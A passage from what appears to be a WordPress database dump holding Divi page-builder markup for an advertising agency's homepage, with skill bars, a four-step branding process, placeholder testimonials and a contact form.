animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.1\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-29 19:16:10','2020-07-29 19:16:10','',134,'https://52.66.212.87/2020/07/29/134-revision-v1/',0,'revision','',0),(377,1,'2020-08-02 21:03:22','2020-08-02 21:03:22','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Creative agency cover image\" title_text=\"Desktop-HD-1024x728 (1)\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" 